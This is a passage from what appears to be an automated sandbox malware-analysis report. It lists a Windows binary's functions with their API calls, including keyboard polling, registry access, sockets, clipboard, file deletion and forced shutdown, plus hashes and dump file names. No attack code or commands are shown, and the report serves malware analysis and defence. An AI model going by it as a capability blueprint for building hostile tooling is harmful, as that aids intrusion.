                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AB83BF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                      • String ID:
                                                      • API String ID: 3996160137-0
                                                      • Opcode ID: b22663e7a307a6244fea4b4f504e0bdc4e6e4896224f4d6877cc5345c3846d96
                                                      • Instruction ID: a024318444d6f20d0ddac6bc82d567ab63dd0970c260ac456273a83fde11bf6a
                                                      • Opcode Fuzzy Hash: b22663e7a307a6244fea4b4f504e0bdc4e6e4896224f4d6877cc5345c3846d96
                                                      • Instruction Fuzzy Hash: 04614C71900209AFDF00DF98DD85AEEBBBDFF04700F148169E915AA292DB399A45DF60
                                                      Function 00A76843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                      • API String ID: 0-4052911093
                                                      • Opcode ID: 92814bfe19f1da81653f004ce409a45267e3372b5d3b216ba6efe47118f49a29
                                                      • Instruction ID: 1cfad5db8bc8a8634b147ba1e737799b443046f55e76efd45d7d78888020b017
                                                      • Opcode Fuzzy Hash: 92814bfe19f1da81653f004ce409a45267e3372b5d3b216ba6efe47118f49a29
                                                      • Instruction Fuzzy Hash: 90727F71E006199BDB24CF59C890BEEB7B5FF48310F54C16AE949EB281EB709D81CB90
                                                      Function 00AE0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00AE10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AE0038,?,?), ref: 00AE10BC
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AE0737
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00AE07D6
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00AE086E
                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00AE0AAD
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AE0ABA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1240663315-0
                                                      • Opcode ID: 403a81340c08942cf56f83e50710743d018cfc33a8f0443c8a5a1689b85e840c
                                                      • Instruction ID: 97237df6414995957f5913fd97b20bdc0362dd9fbd80090e25c5eafca0d08335
                                                      • Opcode Fuzzy Hash: 403a81340c08942cf56f83e50710743d018cfc33a8f0443c8a5a1689b85e840c
                                                      • Instruction Fuzzy Hash: F9E15B31204250AFCB14DF29C995E6BBBF8EF89754F04896DF48ADB262DA30ED41CB51
                                                      Function 00AC0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00AC0241
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00AC02C2
                                                      • GetKeyState.USER32(000000A0), ref: 00AC02DD
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00AC02F7
                                                      • GetKeyState.USER32(000000A1), ref: 00AC030C
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00AC0324
                                                      • GetKeyState.USER32(00000011), ref: 00AC0336
                                                      • GetAsyncKeyState.USER32(00000012), ref: 00AC034E
                                                      • GetKeyState.USER32(00000012), ref: 00AC0360
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00AC0378
                                                      • GetKeyState.USER32(0000005B), ref: 00AC038A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 4641f5b73c0b950caf7274eeb996f2dca74194046f4837a5408b93b2d96f4673
                                                      • Instruction ID: a7118b399c8b71445a3432d6d8c594590cc9653386bda689264543c9b14f6a76
                                                      • Opcode Fuzzy Hash: 4641f5b73c0b950caf7274eeb996f2dca74194046f4837a5408b93b2d96f4673
                                                      • Instruction Fuzzy Hash: 38419B345047C9EEFF319BA48848FF5BEA0AF21344F09409DD6C65E2C2EB9459C4C7A2
                                                      Function 00AD86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                      • CoInitialize.OLE32 ref: 00AD8718
                                                      • CoUninitialize.OLE32 ref: 00AD8723
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00AF2BEC,?), ref: 00AD8783
                                                      • IIDFromString.OLE32(?,?), ref: 00AD87F6
                                                      • VariantInit.OLEAUT32(?), ref: 00AD8890
                                                      • VariantClear.OLEAUT32(?), ref: 00AD88F1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 834269672-1287834457
                                                      • Opcode ID: c889efaffda36e3629a5ff8e5e03a1d1ca5be84bf9dac9041a7ba7db4d6077eb
                                                      • Instruction ID: 4661a37826a4ca3930050ab2aa17e5991fc4f25b24885e6058cceec3709db68c
                                                      • Opcode Fuzzy Hash: c889efaffda36e3629a5ff8e5e03a1d1ca5be84bf9dac9041a7ba7db4d6077eb
                                                      • Instruction Fuzzy Hash: 79618B706083019FD710DF64C988B6EBBE8EF48754F14485AF9869B391DB74ED48CB92
                                                      Function 00AD4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: 3b7ef83508b85ca0ae746f092d86b98d641b7f7043c328c0a8790615005e94b3
                                                      • Instruction ID: 46ef195cc2b95d6cd97def573515732e19a93c50c26f43d62c2c102718d2f021
                                                      • Opcode Fuzzy Hash: 3b7ef83508b85ca0ae746f092d86b98d641b7f7043c328c0a8790615005e94b3
                                                      • Instruction Fuzzy Hash: 8A21AE352002509FDB11EFA0ED49BAA77B8EF48710F14802AF906DB2B1CB34AD02CB54
                                                      Function 00AC3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A648A1,?,?,00A637C0,?), ref: 00A648CE
                                                        • Part of subcall function 00AC4CD3: GetFileAttributesW.KERNEL32(?,00AC3947), ref: 00AC4CD4
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00AC3ADF
                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00AC3B87
                                                      • MoveFileW.KERNEL32(?,?), ref: 00AC3B9A
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00AC3BB7
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AC3BD9
                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00AC3BF5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 4002782344-1173974218
                                                      • Opcode ID: 361af4078772b418b073b026e5436e434d575a1ecf6b54d8fb76e1c2a08d8510
                                                      • Instruction ID: 5960d007a2600187b320ecb52b536074259330296349816c9e08101646749c16
                                                      • Opcode Fuzzy Hash: 361af4078772b418b073b026e5436e434d575a1ecf6b54d8fb76e1c2a08d8510
                                                      • Instruction Fuzzy Hash: CB513F328052499ECF15EBE0DE92EEDB779AF14304F6481A9E44277091EF316F09CBA0
                                                      Function 00ACF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00ACF6AB
                                                      • Sleep.KERNEL32(0000000A), ref: 00ACF6DB
                                                      • _wcscmp.LIBCMT ref: 00ACF6EF
                                                      • _wcscmp.LIBCMT ref: 00ACF70A
                                                      • FindNextFileW.KERNEL32(?,?), ref: 00ACF7A8
                                                      • FindClose.KERNEL32(00000000), ref: 00ACF7BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                      • String ID: *.*
                                                      • API String ID: 713712311-438819550
                                                      • Opcode ID: 2c3cad9c1dcd1cb703a9d81bbd5ff2f595ba18a1b65311c1d9eb424b30e6116d
                                                      • Instruction ID: d641b4d34eb6513c3d44ba67a57cfc961ee7f2610e191bb8ad2192291077dcc9
                                                      • Opcode Fuzzy Hash: 2c3cad9c1dcd1cb703a9d81bbd5ff2f595ba18a1b65311c1d9eb424b30e6116d
                                                      • Instruction Fuzzy Hash: 8F415A7190020AAFCF15DFA4CD89EEEBBB5FF05310F14456AE815A71A1EB309A54CB90
                                                      Function 00A74140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                      • API String ID: 0-1546025612
                                                      • Opcode ID: 053c7b626711aed848b7ec39c758bdef4fec733e524defbce73b84ab3a86823e
                                                      • Instruction ID: 475c29181d24e58f44539ba01c6f9058d930063bbb778466c742b0587fc6d23c
                                                      • Opcode Fuzzy Hash: 053c7b626711aed848b7ec39c758bdef4fec733e524defbce73b84ab3a86823e
                                                      • Instruction Fuzzy Hash: 8EA27D70E0421ACBDF24CF58CD907AEB7B1BB59314F24C1AAD95AA7680E7349E81CF51
                                                      Function 00A758C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: c4c78a7e5b3305e3ee4d5f94109be1f4b36950afcb58907badac87c4f0014342
                                                      • Instruction ID: 51abaa3b65c74f3832c770bdeaedfe2ff27860d3baf1cccf7c47f2955776e498
                                                      • Opcode Fuzzy Hash: c4c78a7e5b3305e3ee4d5f94109be1f4b36950afcb58907badac87c4f0014342
                                                      • Instruction Fuzzy Hash: 6E125970E00609DFDF14DFA5DA85AEEB7B9FF48300F208669E40AA7251EB35AD15CB50
                                                      Function 00AC545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00AB8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AB8D0D
                                                        • Part of subcall function 00AB8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AB8D3A
                                                        • Part of subcall function 00AB8CC3: GetLastError.KERNEL32 ref: 00AB8D47
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00AC549B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-194228
                                                      • Opcode ID: dbfbaa2c9012ab0ef423a39e78b08e3e4337e6434140a1aed506d98dc38a76e1
                                                      • Instruction ID: b91bd9b2e7c61413d5fa1eafba869b911fde94f4cc2f7e92e1118a77ea5f6313
                                                      • Opcode Fuzzy Hash: dbfbaa2c9012ab0ef423a39e78b08e3e4337e6434140a1aed506d98dc38a76e1
                                                      • Instruction Fuzzy Hash: D9014C31E55A011EE72C5378DE4AFB6726DEB01342F210028FC16D60D3DA547CC08690
                                                      Function 00AD6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00AD65EF
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD65FE
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00AD661A
                                                      • listen.WSOCK32(00000000,00000005), ref: 00AD6629
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD6643
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00AD6657
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                      • String ID:
                                                      • API String ID: 1279440585-0
                                                      • Opcode ID: 5283cadfd440ede0e195d340a87343762c8a1aaa028a8fa7c6e5686464ac2174
                                                      • Instruction ID: 2b8f7acb1068a3a35ba829cebaec6515728c169dc05a9134504741d5913f811d
                                                      • Opcode Fuzzy Hash: 5283cadfd440ede0e195d340a87343762c8a1aaa028a8fa7c6e5686464ac2174
                                                      • Instruction Fuzzy Hash: 9A219C312002009FDB14EFA4C989B6EB7B9EF48720F14816AE957AB3D1CB70AD028B51
                                                      Function 00A61287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00A619FA
                                                      • GetSysColor.USER32(0000000F), ref: 00A61A4E
                                                      • SetBkColor.GDI32(?,00000000), ref: 00A61A61
                                                        • Part of subcall function 00A61290: DefDlgProcW.USER32(?,00000020,?), ref: 00A612D8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ColorProc$LongWindow
                                                      • String ID:
                                                      • API String ID: 3744519093-0
                                                      • Opcode ID: 35cf75c23fa7ee406052f7ad27344bad224076f11c35eabac8f3d32875628ec2
                                                      • Instruction ID: 37e597727b1d7ac04347ea594b3d6a96d0a4fb47afcafb7298fe1a1c66cad50a
                                                      • Opcode Fuzzy Hash: 35cf75c23fa7ee406052f7ad27344bad224076f11c35eabac8f3d32875628ec2
                                                      • Instruction Fuzzy Hash: 1CA16971215584BEDB38AB69AE88DBF3DFCDB55396F1C011AF412D61D2CE248D02D2B2
                                                      Function 00AD6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00AD80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AD80CB
                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00AD6AB1
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD6ADA
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00AD6B13
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD6B20
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00AD6B34
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 99427753-0
                                                      • Opcode ID: 4d38a04ca6a6e59f96eb7d89de8d75d5db9498563f3fd5f9e8227ed937869e50
                                                      • Instruction ID: ad8ec39c30c7970775c5b5a435b97b56cfdac66d8e005b519d24284c8f11e611
                                                      • Opcode Fuzzy Hash: 4d38a04ca6a6e59f96eb7d89de8d75d5db9498563f3fd5f9e8227ed937869e50
                                                      • Instruction Fuzzy Hash: 4941C075B00210AFEB10AF64DD86F6E77B9DB48720F04815DF95AAB3D2CA749D018791
                                                      Function 00AE55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: 73bd66243c0ad47611c78d8053e793b0050a7ac421f42b61287558d98284571f
                                                      • Instruction ID: c73666ee6f3cc054c4039ffdff93dd9e0adf2fd969456ea1f7bc5afda224275c
                                                      • Opcode Fuzzy Hash: 73bd66243c0ad47611c78d8053e793b0050a7ac421f42b61287558d98284571f
                                                      • Instruction Fuzzy Hash: 5611C432B009906FEB216F77EC44A2FB7ADFF54765B484429F806DB241CB7499028AA4
                                                      Function 00ADC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00AA1D88,?), ref: 00ADC312
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00ADC324
                                                      Strings
                                                      Memory Dump Source
